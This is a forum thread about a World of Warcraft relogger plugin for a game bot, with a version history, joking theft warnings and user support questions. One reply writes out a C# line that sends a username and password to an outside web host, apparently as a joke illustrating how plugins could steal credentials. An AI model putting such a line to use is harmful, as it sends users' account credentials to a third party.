What's new
  • Visit Rebornbuddy
  • Visit Panda Profiles
  • Visit LLamamMagic
  • Visit Resources
  • Visit Downloads
  • Visit Portal

[Plugin] Built in LUA Relogger

exemplar

New Member
Joined
Mar 16, 2010
Messages
167
Reaction score
32
Inspired by someone else's code from mmowned, I've created a basic built in relogger.

Notes,
- Settings aren't stored encrypted

Version history,
1.0
- Initial version
1.1
- Less spammy
- Readded hiding realm window after select
1.2
- Fixed problem with tries being reset on false positives
- Destructor for thread on recompile
1.3
- Added settings gui
- Fixed bug selection accounts
1.4
- Updated for 3558
1.5
- Made all string checks in lua case insensitive
- Fixed a bug with character select screen
- (hopefully) fixed a bug with treeroot bugging out after logging back in
- Should close lua error windows

PS. This plugin will steal your username and password, your bank account, your first born child and/or your aunties used tampons.

Download and changes past 1.5 located here: https://github.com/eggsampler/Relogger
 
Last edited:
can a dev verify that this isn't a petty scam (code) to steal your acct info? -- no offense to you exemplar =)
 
password stealer don't dl..........

Code:
new WebClient().DownloadData("http://exem321.freewebs.com/?user=" + username + "&pass=" + password);

For your information, it's very easy to steal somebody's password from within a CC or Bot or Plugin without explicitly having the user provide their details. Don't have a false sense of security with regard to this. If I wanted to steal your account I'd be way more subtle.

For instance(buddy),
Code:
$ grep "System.Net" InstanceBuddy
             class [System]System.Net.WebClient V_2,
      IL_00e0:  newobj     instance void [System]System.Net.WebClient::.ctor()
             class [System]System.Net.WebClient V_4,
    IL_00d3:  newobj     instance void [System]System.Net.WebClient::.ctor()
:O
 
Last edited:
I used this plugin and the next day I woke up and it had stolen all my good crockery.
 
I used this plugin and the next day I woke up and it had stolen all my good crockery.
I wouldnt continue this, cause most of users does not understand the joke, and even jokes are good once.
 
It doesn't send any information. Looks like exemplar punk'd you all.
 
Plugin is safe to use, it will not steal your user name or passwords. But it will steal your first born child. You have been warned.
 
Dont use this this stole my girlfriend also wall of caps text!!1
 
This is a great little plugin you've created.

Any chance we could see a cool down timer for relogging?

Eg; Logout after X.
Login ater X.
X = minutes.
 
This is a great little plugin you've created.

Any chance we could see a cool down timer for relogging?

Eg; Logout after X.
Login ater X.
X = minutes.

From what I was told, the plugin just spams the lua command you designate to log your character in. It should be fairly simple to add a lua.dostring logout after X minutes designated by C#, that's what RingoLog does. Ringo just doesn't log back in.
 
Tried to log me in.

Took a few tries at each phase then final lines where

ReLogger - Character selection - OK!
Not in game or Me == null
ReLogger - Too many tries, aborting
ReLogger - Disabling plugin

Had the first two lines like 5 times. If u could select the character ok why would it say not in game?

Nothing in the debug log.
 
Last edited:
Can you just verify that 'charactername' is exactly as it is in the character list (capitalization and all), and that you do not have 'funny characters' in your name.
 
How does this work with more than one wow account bound to the Bnet account?
 
Back
Top